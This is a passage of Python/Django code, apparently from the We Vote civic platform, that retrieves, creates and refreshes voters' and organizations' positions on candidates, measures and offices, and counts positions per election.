positive_value_exists(vote_smart_time_span):
try:
organization_id = 0
# organization_we_vote_id = ""
voter_id = 0
office_id = 0
voter_we_vote_id = ""
office_we_vote_id = ""
candidate_id = 0
# candidate_we_vote_id = ""
measure_id = 0
measure_we_vote_id = ""
google_civic_election_id = 0
# vote_smart_time_span = ""
results = position_manager.retrieve_position_table_unknown(
position_we_vote_id, organization_id, organization_we_vote_id,
voter_id,
office_id, candidate_id,
measure_id,
voter_we_vote_id,
office_we_vote_id,
candidate_we_vote_id,
measure_we_vote_id,
google_civic_election_id,
vote_smart_time_span,
)
if results['position_found']:
position_on_stage = results['position']
position_on_stage_found = True
found_with_status = "FOUND_WITH_CANDIDATE_AND_ORGANIZATION_WE_VOTE_ID_WITH_TIME_SPAN "
except MultipleObjectsReturned as e:
handle_record_found_more_than_one_exception(e, logger)
exception_multiple_object_returned = True
status = "FAILED-MULTIPLE_FOUND_WITH_CANDIDATE_AND_ORGANIZATION_WE_VOTE_ID_WITH_TIME_SPAN"
except ObjectDoesNotExist as e:
# Not a problem -- a position matching this candidate_we_vote_id wasn't found
pass
# 4) measure_we_vote_id + organization_we_vote_id exists? Try to find it. If not, go to step 5
if positive_value_exists(measure_we_vote_id) and \
positive_value_exists(organization_we_vote_id) and \
positive_value_exists(google_civic_election_id):
try:
organization_id = 0
# organization_we_vote_id = ""
voter_id = 0
office_id = 0
voter_we_vote_id = ""
office_we_vote_id = ""
candidate_id = 0
candidate_we_vote_id = ""
measure_id = 0
# measure_we_vote_id = ""
# google_civic_election_id = 0
vote_smart_time_span = ""
results = position_manager.retrieve_position_table_unknown(
position_we_vote_id, organization_id, organization_we_vote_id,
voter_id,
office_id, candidate_id,
measure_id,
voter_we_vote_id,
office_we_vote_id,
candidate_we_vote_id,
measure_we_vote_id,
google_civic_election_id,
vote_smart_time_span
)
if results['position_found']:
position_on_stage = results['position']
position_on_stage_found = True
found_with_status = "FOUND_WITH_MEASURE_AND_ORGANIZATION_WE_VOTE_ID"
except MultipleObjectsReturned as e:
handle_record_found_more_than_one_exception(e, logger)
exception_multiple_object_returned = True
status = "FAILED-MULTIPLE_FOUND_WITH_MEASURE_AND_ORGANIZATION_WE_VOTE_ID"
except ObjectDoesNotExist as e:
# Not a problem -- a position matching this candidate_we_vote_id wasn't found
pass
# 5) office_we_vote_id + organization_we_vote_id exists? Try to find it. If not, go to step 6
if positive_value_exists(office_we_vote_id) and \
positive_value_exists(organization_we_vote_id) and \
positive_value_exists(google_civic_election_id):
try:
organization_id = 0
# organization_we_vote_id = ""
voter_id = 0
office_id = 0
voter_we_vote_id = ""
# office_we_vote_id = ""
candidate_id = 0
candidate_we_vote_id = ""
measure_id = 0
measure_we_vote_id = ""
# google_civic_election_id = 0
vote_smart_time_span = ""
results = position_manager.retrieve_position_table_unknown(
position_we_vote_id, organization_id, organization_we_vote_id,
voter_id,
office_id, candidate_id,
measure_id,
voter_we_vote_id,
office_we_vote_id,
candidate_we_vote_id,
measure_we_vote_id,
google_civic_election_id,
vote_smart_time_span,
)
if results['position_found']:
position_on_stage = results['position']
position_on_stage_found = True
found_with_status = "FOUND_WITH_OFFICE_AND_ORGANIZATION_WE_VOTE_ID"
except MultipleObjectsReturned as e:
handle_record_found_more_than_one_exception(e, logger)
exception_multiple_object_returned = True
status = "FAILED-MULTIPLE_FOUND_WITH_OFFICE_AND_ORGANIZATION_WE_VOTE_ID"
except ObjectDoesNotExist as e:
# Not a problem -- a position matching this office_we_vote_id wasn't found
pass
# TODO Test public_figure (6-8) and voter (9-11) related cases
# 6-8: Public-Figure-related cases
# 6) candidate_we_vote_id + public_figure_we_vote_id exists? Try to find it. If not, go to step 7
if positive_value_exists(candidate_we_vote_id) and \
positive_value_exists(public_figure_we_vote_id) and \
positive_value_exists(google_civic_election_id):
try:
organization_id = 0
organization_we_vote_id = ""
voter_id = 0
office_id = 0
voter_we_vote_id = ""
office_we_vote_id = ""
candidate_id = 0
# candidate_we_vote_id = ""
measure_id = 0
measure_we_vote_id = ""
# google_civic_election_id = 0
vote_smart_time_span = ""
# TODO public_figure code needs to be added for this to work
results = position_manager.retrieve_position_table_unknown(
position_we_vote_id, organization_id, organization_we_vote_id,
voter_id,
office_id, candidate_id,
measure_id,
voter_we_vote_id,
office_we_vote_id,
candidate_we_vote_id,
measure_we_vote_id,
google_civic_election_id,
vote_smart_time_span,
)
if results['position_found']:
position_on_stage = results['position']
position_on_stage_found = False # TODO Update when working
found_with_status = "FOUND_WITH_CANDIDATE_AND_PUBLIC_FIGURE_WE_VOTE_ID"
except MultipleObjectsReturned as e:
handle_record_found_more_than_one_exception(e, logger)
exception_multiple_object_returned = True
status = "FAILED-MULTIPLE_FOUND_WITH_CANDIDATE_AND_PUBLIC_FIGURE_WE_VOTE_ID"
except ObjectDoesNotExist as e:
# Not a problem -- a position matching this candidate_we_vote_id wasn't found
pass
# 7) measure_we_vote_id + public_figure_we_vote_id exists? Try to find it. If not, go to step 8
if positive_value_exists(measure_we_vote_id) and \
positive_value_exists(public_figure_we_vote_id) and \
positive_value_exists(google_civic_election_id):
try:
# TODO DALE replace with retrieve_position_table_unknown
position_on_stage = position_on_stage_starter.objects.get(
contest_measure_we_vote_id__iexact=measure_we_vote_id,
public_figure_we_vote_id__iexact=public_figure_we_vote_id,
google_civic_election_id=google_civic_election_id,
state_code__iexact=state_code,
)
position_on_stage_found = False # TODO Update when working
found_with_status = "FOUND_WITH_MEASURE_AND_PUBLIC_FIGURE_WE_VOTE_ID"
except MultipleObjectsReturned as e:
handle_record_found_more_than_one_exception(e, logger)
exception_multiple_object_returned = True
status = "FAILED-MULTIPLE_FOUND_WITH_MEASURE_AND_PUBLIC_FIGURE_WE_VOTE_ID"
except ObjectDoesNotExist as e:
# Not a problem -- a position matching this candidate_we_vote_id wasn't found
pass
# 8) office_we_vote_id + public_figure_we_vote_id exists? Try to find it. If not, go to step 9
if positive_value_exists(office_we_vote_id) and \
positive_value_exists(public_figure_we_vote_id) and \
positive_value_exists(google_civic_election_id):
try:
# TODO DALE replace with retrieve_position_table_unknown
position_on_stage = position_on_stage_starter.objects.get(
contest_office_we_vote_id__iexact=office_we_vote_id,
public_figure_we_vote_id__iexact=public_figure_we_vote_id,
google_civic_election_id=google_civic_election_id,
state_code__iexact=state_code
)
position_on_stage_found = False # TODO Update when public_figure working
found_with_status = "FOUND_WITH_OFFICE_AND_VOTER_WE_VOTE_ID"
except MultipleObjectsReturned as e:
handle_record_found_more_than_one_exception(e, logger)
exception_multiple_object_returned = True
status = "FAILED-MULTIPLE_FOUND_WITH_OFFICE_AND_VOTER_WE_VOTE_ID"
except ObjectDoesNotExist as e:
# Not a problem -- a position matching this office_we_vote_id wasn't found
pass
# 9-11: Voter-related cases
# 9) candidate_we_vote_id + organization_we_vote_id exists? Try to find it. If not, go to step 10
if positive_value_exists(candidate_we_vote_id) and \
positive_value_exists(voter_we_vote_id) and \
positive_value_exists(google_civic_election_id):
try:
organization_id = 0
organization_we_vote_id = ""
voter_id = 0
office_id = 0
# voter_we_vote_id = ""
office_we_vote_id = ""
candidate_id = 0
# candidate_we_vote_id = ""
measure_id = 0
measure_we_vote_id = ""
vote_smart_time_span = ""
results = position_manager.retrieve_position_table_unknown(
position_we_vote_id, organization_id, organization_we_vote_id,
voter_id,
office_id, candidate_id,
measure_id,
voter_we_vote_id,
office_we_vote_id,
candidate_we_vote_id,
measure_we_vote_id,
google_civic_election_id,
vote_smart_time_span,
)
if results['position_found']:
position_on_stage = results['position']
position_on_stage_found = True
found_with_status = "FOUND_WITH_CANDIDATE_AND_VOTER_WE_VOTE_ID"
except MultipleObjectsReturned as e:
handle_record_found_more_than_one_exception(e, logger)
exception_multiple_object_returned = True
status = "FAILED-MULTIPLE_FOUND_WITH_CANDIDATE_AND_VOTER_WE_VOTE_ID"
except ObjectDoesNotExist as e:
# Not a problem -- a position matching this candidate_we_vote_id wasn't found
pass
# 10) measure_we_vote_id + voter_we_vote_id exists? Try to find it. If not, go to step 11
if positive_value_exists(measure_we_vote_id) and \
positive_value_exists(voter_we_vote_id) and \
positive_value_exists(google_civic_election_id):
try:
organization_id = 0
organization_we_vote_id = ""
voter_id = 0
office_id = 0
# voter_we_vote_id = ""
office_we_vote_id = ""
candidate_id = 0
candidate_we_vote_id = ""
measure_id = 0
# measure_we_vote_id = ""
# google_civic_election_id = 0
vote_smart_time_span = ""
results = position_manager.retrieve_position_table_unknown(
position_we_vote_id, organization_id, organization_we_vote_id,
voter_id,
office_id, candidate_id,
measure_id,
voter_we_vote_id,
office_we_vote_id,
candidate_we_vote_id,
measure_we_vote_id,
google_civic_election_id,
vote_smart_time_span,
)
if results['position_found']:
position_on_stage = results['position']
position_on_stage_found = True
found_with_status = "FOUND_WITH_MEASURE_AND_VOTER_WE_VOTE_ID"
except MultipleObjectsReturned as e:
handle_record_found_more_than_one_exception(e, logger)
exception_multiple_object_returned = True
status = "FAILED-MULTIPLE_FOUND_WITH_MEASURE_AND_VOTER_WE_VOTE_ID"
except ObjectDoesNotExist as e:
# Not a problem -- a position matching this candidate_we_vote_id wasn't found
pass
# 11) office_we_vote_id + organization_we_vote_id exists? Try to find it.
if positive_value_exists(office_we_vote_id) and \
positive_value_exists(voter_we_vote_id) and \
positive_value_exists(google_civic_election_id):
try:
organization_id = 0
organization_we_vote_id = ""
voter_id = 0
office_id = 0
# voter_we_vote_id = ""
# office_we_vote_id = ""
candidate_id = 0
candidate_we_vote_id = ""
measure_id = 0
measure_we_vote_id = ""
vote_smart_time_span = ""
results = position_manager.retrieve_position_table_unknown(
position_we_vote_id, organization_id, organization_we_vote_id,
voter_id,
office_id, candidate_id,
measure_id,
voter_we_vote_id,
office_we_vote_id,
candidate_we_vote_id,
measure_we_vote_id,
google_civic_election_id,
vote_smart_time_span,
)
if results['position_found']:
position_on_stage = results['position']
position_on_stage_found = True
found_with_status = "FOUND_WITH_OFFICE_AND_VOTER_WE_VOTE_ID"
except MultipleObjectsReturned as e:
handle_record_found_more_than_one_exception(e, logger)
exception_multiple_object_returned = True
status = "FAILED-MULTIPLE_FOUND_WITH_OFFICE_AND_VOTER_WE_VOTE_ID"
except ObjectDoesNotExist as e:
# Not a problem -- a position matching this office wasn't found
pass
# Save values entered in steps 3-11
if position_on_stage_found:
try:
if ballot_item_display_name or stance or statement_text or statement_html or more_info_url:
if ballot_item_display_name:
position_on_stage.ballot_item_display_name = ballot_item_display_name
if stance:
position_on_stage.stance = stance
if statement_text:
position_on_stage.statement_text = statement_text
if statement_html:
position_on_stage.statement_html = statement_html
if more_info_url:
position_on_stage.more_info_url = more_info_url
position_on_stage.save()
position_list_manager.update_position_network_scores_for_one_position(position_on_stage)
success = True
status = found_with_status + " SAVED"
else:
success = True
status = found_with_status + " NO_CHANGES_SAVED"
except Exception as e:
handle_record_not_saved_exception(e, logger=logger)
failed_saving_existing_position = True
if not position_on_stage_found \
and not exception_multiple_object_returned \
and not failed_saving_existing_position \
and not too_many_unique_ballot_item_variables_received and not too_many_unique_actor_variables_received:
try:
# If here, create new position
# Some functions pass in these values with "False" if we don't want to update the value. Because of
# this we want to change the value away from "False" when we create a new entry.
speaker_display_name = ""
candidate_campaign_id = None
if candidate_we_vote_id:
candidate_campaign_manager = CandidateCampaignManager()
results = candidate_campaign_manager.retrieve_candidate_campaign_from_we_vote_id(
candidate_we_vote_id)
if results['candidate_campaign_found']:
candidate_campaign = results['candidate_campaign']
candidate_campaign_id = candidate_campaign.id
google_civic_election_id = candidate_campaign.google_civic_election_id
state_code = candidate_campaign.state_code
ballot_item_display_name = candidate_campaign.candidate_name
else:
# We don't need to ever look up the candidate_we_vote_id from the candidate_campaign_id
candidate_we_vote_id = None
contest_measure_id = None
if measure_we_vote_id:
contest_measure_manager = ContestMeasureManager()
results = contest_measure_manager.retrieve_contest_measure_from_we_vote_id(measure_we_vote_id)
if results['contest_measure_found']:
contest_measure = results['contest_measure']
contest_measure_id = contest_measure.id
google_civic_election_id = contest_measure.google_civic_election_id
state_code = contest_measure.state_code
ballot_item_display_name = contest_measure.measure_title
else:
# We don't need to ever look up the measure_we_vote_id from the contest_measure_id
measure_we_vote_id = None
contest_office_id = None
if office_we_vote_id:
contest_office_manager = ContestOfficeManager()
results = contest_office_manager.retrieve_contest_office_from_we_vote_id(office_we_vote_id)
if results['contest_office_found']:
contest_office = results['contest_office']
contest_office_id = contest_office.id
google_civic_election_id = contest_office.google_civic_election_id
state_code = contest_office.state_code
ballot_item_display_name = contest_office.office_name
else:
# We don't need to ever look up the office_we_vote_id from the contest_office_id
office_we_vote_id = None
if google_civic_election_id is False:
google_civic_election_id = None
if state_code is False:
state_code = None
if ballot_item_display_name is False:
ballot_item_display_name = None
if stance not in(SUPPORT, NO_STANCE, INFORMATION_ONLY, STILL_DECIDING, OPPOSE, PERCENT_RATING):
stance = NO_STANCE
if statement_text is False:
statement_text = None
if statement_html is False:
statement_html = None
if more_info_url is False:
more_info_url = None
if vote_smart_time_span is False:
vote_smart_time_span = None
if vote_smart_rating_id is False:
vote_smart_rating_id = None
if vote_smart_rating is False:
vote_smart_rating = None
if vote_smart_rating_name is False:
vote_smart_rating_name = None
# In order to show a position publicly we need to tie the position to either organization_we_vote_id,
# public_figure_we_vote_id or candidate_we_vote_id. For now (2016-8-17) we assume organization
voter_manager = VoterManager()
results = voter_manager.retrieve_voter_by_we_vote_id(voter_we_vote_id)
voter_id = 0
if results['voter_found']:
voter = results['voter']
voter_id = voter.id
organization_we_vote_id = voter.linked_organization_we_vote_id
if positive_value_exists(organization_we_vote_id):
# Look up the organization_id
organization_manager = OrganizationManager()
organization_results = organization_manager.retrieve_organization_from_we_vote_id(
organization_we_vote_id)
if organization_results['organization_found']:
organization = organization_results['organization']
organization_id = organization.id
speaker_display_name = organization.organization_name
if positive_value_exists(state_code):
state_code = state_code.lower()
position_on_stage = position_on_stage_starter.objects.create(
organization_we_vote_id=organization_we_vote_id,
organization_id=organization_id,
voter_we_vote_id=voter_we_vote_id,
voter_id=voter_id,
google_civic_election_id=google_civic_election_id,
state_code=state_code,
ballot_item_display_name=ballot_item_display_name,
speaker_display_name=speaker_display_name,
contest_office_we_vote_id=office_we_vote_id,
contest_office_id=contest_office_id,
candidate_campaign_we_vote_id=candidate_we_vote_id,
candidate_campaign_id=candidate_campaign_id,
contest_measure_we_vote_id=measure_we_vote_id,
contest_measure_id=contest_measure_id,
stance=stance,
statement_text=statement_text,
statement_html=statement_html,
more_info_url=more_info_url,
vote_smart_time_span=vote_smart_time_span,
vote_smart_rating_id=vote_smart_rating_id,
vote_smart_rating=vote_smart_rating,
vote_smart_rating_name=vote_smart_rating_name
)
position_list_manager.update_position_network_scores_for_one_position(position_on_stage)
status = "CREATE_POSITION_SUCCESSFUL"
success = True
new_position_created = True
except Exception as e:
handle_record_not_saved_exception(e, logger=logger)
success = False
status = "NEW_POSITION_COULD_NOT_BE_CREATED"
if set_as_public_position:
position_on_stage = PositionEntered()
else:
position_on_stage = PositionForFriends()
results = {
'success': success,
'status': status,
'DoesNotExist': exception_does_not_exist,
'MultipleObjectsReturned': exception_multiple_object_returned,
'position': position_on_stage,
'new_position_created': new_position_created,
}
return results
def refresh_cached_position_info(self, position_object,
force_update=False,
offices_dict={},
candidates_dict={},
measures_dict={},
organizations_dict={},
voters_by_linked_org_dict={},
voters_dict={}):
"""
The position tables cache information from other tables. This function reaches out to the source tables
and copies over the latest information to the position tables. In order to reduce the number of database calls
to retrieve offices, candidates, measures, etc., we pass out dicts with these values, and accept them back in
so we don't need to retrieve data we pulled from the database microseconds before.
:param position_object:
:param force_update:
:param offices_dict: key = office_we_vote_id, value = office object
:param candidates_dict: key = candidate_we_vote_id, value = candidate object
:param measures_dict: key = measure_we_vote_id, value = measure object
:param organizations_dict: key = organization_we_vote_id, value = organization object
:param voters_by_linked_org_dict: key = linked_organization_we_vote_id, value = voter object
:param voters_dict: key = voter_we_vote_id, value = voter object
:return:
"""
success = True
status = ""
position_change = False
# Start with "speaker" information (Organization, Voter, or Public Figure)
organization_found = False
if not positive_value_exists(position_object.speaker_display_name) \
or not positive_value_exists(position_object.speaker_image_url_https) \
or not positive_value_exists(position_object.speaker_twitter_handle) \
or not positive_value_exists(position_object.speaker_image_url_https_large) \
or not positive_value_exists(position_object.speaker_image_url_https_medium) \
or not positive_value_exists(position_object.speaker_image_url_https_tiny) \
or force_update:
try:
# We need to look in the organization table for speaker_display_name & speaker images
organization_manager = OrganizationManager()
if positive_value_exists(position_object.organization_we_vote_id) \
and position_object.organization_we_vote_id in organizations_dict:
organization = organizations_dict[position_object.organization_we_vote_id]
organization_found = True
else:
organization_id = 0
results = organization_manager.retrieve_organization(organization_id,
position_object.organization_we_vote_id)
if results['organization_found']:
organization = results['organization']
organization_found = True
organizations_dict[organization.we_vote_id] = organization
if organization_found:
# Make sure we have an organization name
if not positive_value_exists(organization.organization_name):
linked_voter_found = False
if positive_value_exists(organization.we_vote_id) \
and organization.we_vote_id in voters_by_linked_org_dict:
linked_voter = voters_by_linked_org_dict[organization.we_vote_id]
linked_voter_found = True
else:
try:
linked_voter = Voter.objects.get(
linked_organization_we_vote_id__iexact=organization.we_vote_id)
linked_voter_found = True
voters_by_linked_org_dict[organization.we_vote_id] = linked_voter
except Voter.DoesNotExist:
pass
if linked_voter_found:
if linked_voter.get_full_name():
try:
organization.organization_name = linked_voter.get_full_name()
organization.save()
except Exception as e:
pass
if not positive_value_exists(position_object.speaker_display_name) or force_update:
# speaker_display_name is missing so look it up from source
position_object.speaker_display_name = organization.organization_name
position_change = True
if not positive_value_exists(position_object.speaker_image_url_https) or force_update:
# speaker_image_url_https is missing so look it up from source
position_object.speaker_image_url_https = organization.organization_photo_url()
position_change = True
if not positive_value_exists(position_object.speaker_image_url_https_large) or force_update:
# speaker_image_url_https_large is missing so look it up from source
position_object.speaker_image_url_https_large = \
organization.we_vote_hosted_profile_image_url_large
position_change = True
if not positive_value_exists(position_object.speaker_image_url_https_medium) or force_update:
# speaker_image_url_https_medium is missing so look it up from source
position_object.speaker_image_url_https_medium = \
organization.we_vote_hosted_profile_image_url_medium
position_change = True
if not positive_value_exists(position_object.speaker_image_url_https_tiny) or force_update:
# speaker_image_url_https_tiny is missing so look it up from source
position_object.speaker_image_url_https_tiny = \
organization.we_vote_hosted_profile_image_url_tiny
position_change = True
if not positive_value_exists(position_object.speaker_twitter_handle) or force_update:
organization_twitter_handle = \
organization_manager.fetch_twitter_handle_from_organization_we_vote_id(
organization.we_vote_id)
# speaker_twitter_handle is missing so look it up from source
position_object.speaker_twitter_handle = organization_twitter_handle
position_change = True
if not positive_value_exists(position_object.organization_id) \
or position_object.organization_id != organization.id:
position_object.organization_id = organization.id
position_change = True
except Exception as e:
pass
if not organization_found:
voter_manager = VoterManager()
voter_found = False
if positive_value_exists(position_object.voter_we_vote_id):
# We need to look in the voter table for speaker_display_name
if position_object.voter_we_vote_id in voters_dict:
voter = voters_dict[position_object.voter_we_vote_id]
voter_found = True
else:
results = voter_manager.retrieve_voter_by_we_vote_id(position_object.voter_we_vote_id)
if results['voter_found']:
voter = results['voter']
voter_found = True
voters_dict[voter.we_vote_id] = voter
if not voter_found and positive_value_exists(position_object.voter_id):
# We need to look in the voter table for speaker_display_name
results = voter_manager.retrieve_voter_by_id(position_object.voter_id)
if results['voter_found']:
voter = results['voter']
voter_found = True
if voter.we_vote_id not in voters_dict:
voters_dict[voter.we_vote_id] = voter
if voter_found:
try:
if not positive_value_exists(position_object.speaker_display_name) or force_update:
# speaker_display_name is missing so look it up from source
position_object.speaker_display_name = voter.get_full_name()
position_change = True
if not positive_value_exists(position_object.voter_we_vote_id) or force_update:
# voter_we_vote_id is missing so look it up from source
position_object.voter_we_vote_id = voter.we_vote_id
position_change = True
if not positive_value_exists(position_object.voter_id) or force_update:
# voter_id is missing so look it up from source
position_object.voter_id = voter.id
position_change = True
if not positive_value_exists(position_object.speaker_image_url_https) or force_update:
# speaker_image_url_https is missing so look it up from source
position_object.speaker_image_url_https = voter.voter_photo_url()
position_change = True
if not positive_value_exists(position_object.speaker_image_url_https_large) or force_update:
# speaker_image_url_https_large is missing so look it up from source
position_object.speaker_image_url_https_large = \
voter.we_vote_hosted_profile_image_url_large
position_change = True
if not positive_value_exists(position_object.speaker_image_url_https_medium) or force_update:
# speaker_image_url_https_medium is missing so look it up from source
position_object.speaker_image_url_https_medium = \
voter.we_vote_hosted_profile_image_url_medium
position_change = True
if not positive_value_exists(position_object.speaker_image_url_https_tiny) or force_update:
# speaker_image_url_https_tiny is missing so look it up from source
position_object.speaker_image_url_https_tiny = \
voter.we_vote_hosted_profile_image_url_tiny
position_change = True
if not positive_value_exists(position_object.speaker_twitter_handle) or force_update:
# speaker_twitter_handle is missing so look it up from source
voter_twitter_handle = voter_manager.fetch_twitter_handle_from_voter_we_vote_id(
voter.we_vote_id)
position_object.speaker_twitter_handle = voter_twitter_handle
position_change = True
except Exception as e:
pass
# Now move onto "ballot_item" information
# Candidate
check_for_missing_office_data = False
candidate_campaign_manager = CandidateCampaignManager()
contest_office_id = 0
contest_office_we_vote_id = ""
if positive_value_exists(position_object.candidate_campaign_id) or \
positive_value_exists(position_object.candidate_campaign_we_vote_id):
check_for_missing_office_data = True # We check separately
if not positive_value_exists(position_object.ballot_item_display_name) \
or not positive_value_exists(position_object.ballot_item_image_url_https) \
or not positive_value_exists(position_object.ballot_item_image_url_https_large) \
or not positive_value_exists(position_object.ballot_item_image_url_https_medium) \
or not positive_value_exists(position_object.ballot_item_image_url_https_tiny) \
or not positive_value_exists(position_object.ballot_item_twitter_handle) \
or not positive_value_exists(position_object.state_code) \
or not positive_value_exists(position_object.political_party) \
or not positive_value_exists(position_object.politician_id) \
or not positive_value_exists(position_object.politician_we_vote_id) \
or force_update:
try:
# We need to look in the voter table for speaker_display_name
candidate_found = False
if positive_value_exists(position_object.candidate_campaign_we_vote_id) \
and position_object.candidate_campaign_we_vote_id in candidates_dict:
candidate = candidates_dict[position_object.candidate_campaign_we_vote_id]
candidate_found = True
else:
results = candidate_campaign_manager.retrieve_candidate_campaign(
position_object.candidate_campaign_id, position_object.candidate_campaign_we_vote_id)
if results['candidate_campaign_found']:
candidate = results['candidate_campaign']
candidate_found = True
candidates_dict[candidate.we_vote_id] = candidate
if candidate_found:
# Cache for further down
contest_office_id = candidate.contest_office_id
contest_office_we_vote_id = candidate.contest_office_we_vote_id
if not positive_value_exists(position_object.contest_office_id) or force_update:
position_object.contest_office_id = contest_office_id
position_change = True
if not positive_value_exists(position_object.contest_office_we_vote_id) or force_update:
position_object.contest_office_we_vote_id = contest_office_we_vote_id
position_change = True
if not positive_value_exists(position_object.ballot_item_display_name) or force_update:
# ballot_item_display_name is missing so look it up from source
position_object.ballot_item_display_name = candidate.display_candidate_name()
position_change = True
if not positive_value_exists(position_object.ballot_item_image_url_https) or force_update:
# ballot_item_image_url_https is missing so look it up from source
position_object.ballot_item_image_url_https = candidate.candidate_photo_url()
position_change = True
if not positive_value_exists(position_object.ballot_item_image_url_https_large) or force_update:
# ballot_item_image_url_https_large is missing so look it up from source
position_object.ballot_item_image_url_https_large = \
candidate.we_vote_hosted_profile_image_url_large
position_change = True
if not positive_value_exists(position_object.ballot_item_image_url_https_medium) \
or force_update:
# ballot_item_image_url_https_medium is missing so look it up from source
position_object.ballot_item_image_url_https_medium = \
candidate.we_vote_hosted_profile_image_url_medium
position_change = True
if not positive_value_exists(position_object.ballot_item_image_url_https_tiny) or force_update:
# ballot_item_image_url_https_tiny is missing so look it up from source
position_object.ballot_item_image_url_https_tiny = \
candidate.we_vote_hosted_profile_image_url_tiny
position_change = True
if not positive_value_exists(position_object.ballot_item_twitter_handle) or force_update:
# ballot_item_image_twitter_handle is missing so look it up from source
position_object.ballot_item_twitter_handle = candidate.candidate_twitter_handle
position_change = True
if not positive_value_exists(position_object.state_code) or force_update:
# state_code is missing so look it up from source
position_object.state_code = candidate.get_candidate_state()
position_change = True
if not positive_value_exists(position_object.political_party) or force_update:
# political_party is missing so look it up from source
position_object.political_party = candidate.political_party_display()
position_change = True
if not positive_value_exists(position_object.politician_id) or force_update:
# politician_id is missing so look it up from source
position_object.politician_id = candidate.politician_id
position_change = True
if not positive_value_exists(position_object.politician_we_vote_id) or force_update:
# politician_we_vote_id is missing so look it up from source
position_object.politician_we_vote_id = candidate.politician_we_vote_id
position_change = True
except Exception as e:
pass
# Measure
elif positive_value_exists(position_object.contest_measure_id) or \
positive_value_exists(position_object.contest_measure_we_vote_id):
if not positive_value_exists(position_object.ballot_item_display_name) \
or position_object.ballot_item_display_name == "None" \
or positive_value_exists(position_object.ballot_item_image_url_https) \
or positive_value_exists(position_object.ballot_item_twitter_handle) \
or not positive_value_exists(position_object.state_code) \
or force_update:
try:
# We need to look in the voter table for speaker_display_name
contest_measure_found = False
contest_measure_manager = ContestMeasureManager()
if positive_value_exists(position_object.contest_measure_we_vote_id) \
and position_object.contest_measure_we_vote_id in measures_dict:
contest_measure = measures_dict[position_object.contest_measure_we_vote_id]
contest_measure_found = True
else:
results = contest_measure_manager.retrieve_contest_measure(
position_object.contest_measure_id, position_object.contest_measure_we_vote_id)
if results['contest_measure_found']:
contest_measure = results['contest_measure']
contest_measure_found = True
measures_dict[contest_measure.we_vote_id] = contest_measure
if contest_measure_found:
if not positive_value_exists(position_object.ballot_item_display_name) \
or position_object.ballot_item_display_name == "None" \
or force_update:
# ballot_item_display_name is missing so look it up from source
position_object.ballot_item_display_name = contest_measure.measure_title
position_change = True
if positive_value_exists(position_object.ballot_item_image_url_https) or force_update:
# ballot_item_image_url_https should not exist for measures
position_object.ballot_item_image_url_https = ""
position_change = True
if positive_value_exists(position_object.ballot_item_twitter_handle) or force_update:
# ballot_item_image_twitter_handle should not exist for measures
position_object.ballot_item_twitter_handle = ""
position_change = True
if not positive_value_exists(position_object.state_code) or force_update:
# state_code is missing so look it up from source
position_object.state_code = contest_measure.state_code
position_change = True
except Exception as e:
pass
# Office - We are only here if NOT a candidate and NOT a measure
elif positive_value_exists(position_object.contest_office_id) or \
positive_value_exists(position_object.contest_office_we_vote_id):
check_for_missing_office_data = True
if check_for_missing_office_data:
if not positive_value_exists(position_object.contest_office_id) \
or not positive_value_exists(position_object.contest_office_we_vote_id) \
or not positive_value_exists(position_object.contest_office_name) \
or force_update:
if not positive_value_exists(position_object.contest_office_id) \
and not positive_value_exists(position_object.contest_office_we_vote_id):
if not contest_office_id or not contest_office_we_vote_id:
# If here we need to get the contest_office identifier from the candidate
candidate_found = False
if positive_value_exists(position_object.candidate_campaign_we_vote_id) \
and position_object.candidate_campaign_we_vote_id in candidates_dict:
candidate = candidates_dict[position_object.candidate_campaign_we_vote_id]
candidate_found = True
else:
candidate_results = candidate_campaign_manager.retrieve_candidate_campaign_from_we_vote_id(
position_object.candidate_campaign_we_vote_id)
if candidate_results['candidate_campaign_found']:
candidate = candidate_results['candidate_campaign']
candidate_found = True
candidates_dict[candidate.we_vote_id] = candidate
if candidate_found:
position_object.contest_office_id = candidate.contest_office_id
position_object.contest_office_we_vote_id = candidate.contest_office_we_vote_id
position_change = True
else:
position_object.contest_office_id = contest_office_id
position_object.contest_office_we_vote_id = contest_office_we_vote_id
position_change = True
office_found = False
contest_office_manager = ContestOfficeManager()
if positive_value_exists(position_object.contest_office_we_vote_id) \
and position_object.contest_office_we_vote_id in offices_dict:
office = offices_dict[position_object.contest_office_we_vote_id]
office_found = True
elif positive_value_exists(position_object.contest_office_we_vote_id):
results = contest_office_manager.retrieve_contest_office_from_we_vote_id(
position_object.contest_office_we_vote_id)
if results['contest_office_found']:
office = results['contest_office']
office_found = True
offices_dict[office.we_vote_id] = office
if not office_found and positive_value_exists(position_object.contest_office_id):
results = contest_office_manager.retrieve_contest_office_from_id(position_object.contest_office_id)
if results['contest_office_found']:
office = results['contest_office']
office_found = True
offices_dict[office.we_vote_id] = office
if office_found:
if not positive_value_exists(position_object.contest_office_id) or force_update:
position_object.contest_office_id = office.id
position_change = True
if not positive_value_exists(position_object.contest_office_we_vote_id) or force_update:
position_object.contest_office_we_vote_id = office.we_vote_id
position_change = True
if not positive_value_exists(position_object.contest_office_name) or force_update:
position_object.contest_office_name = office.office_name
position_change = True
if position_change:
position_object.save()
results = {
'success': success,
'status': status,
'position': position_object,
'offices_dict': offices_dict,
'candidates_dict': candidates_dict,
'measures_dict': measures_dict,
'organizations_dict': organizations_dict,
'voters_by_linked_org_dict': voters_by_linked_org_dict,
'voters_dict': voters_dict,
}
return results
def count_positions_for_election(self, google_civic_election_id, retrieve_public_positions=True):
"""
Return count of positions for a given election
:param google_civic_election_id:
:param retrieve_public_positions:
:return:
"""
if positive_value_exists(retrieve_public_positions):
position_item_queryset = PositionEntered.objects.all()
else:
position_item_queryset = PositionForFriends.objects.all()
# As of Aug 2018 we are no longer using PERCENT_RATING
position_item_queryset = position_item_queryset.exclude(stance__iexact=PERCENT_RATING)
positions_count = 0
success = False
if positive_value_exists(google_civic_election_id):
# get count of positions
try:
position_item_queryset = position_item_queryset.filter(
google_civic_election_id=google_civic_election_id)
positions_count = position_item_queryset.count()
status = 'POSITION_ITEMS_FOUND '
success = True
except PositionEntered.DoesNotExist:
# No position items found. Not a problem.
status = 'NO_POSITION_ITEMS_FOUND '
success = True
except Exception as e:
handle_exception(e, logger=logger)
status = 'FAILED retrieve_position_items_for_election ' \
'{error} [type: {error_type}]'.format(error=e.message, error_type=type(e))
else:
status = 'INVALID_GOOGLE_CIVIC_ELECTION_ID'
results = {
'success': success,
'status': status,
'positions_count': positions_count
}
return results
class PositionMetricsManager(models.Model):
def __unicode__(self):
return "PositionMetricsManager"
def fetch_positions_public(self, google_civic_election_id=0, positions_taken_by_these_voter_we_vote_ids=False):
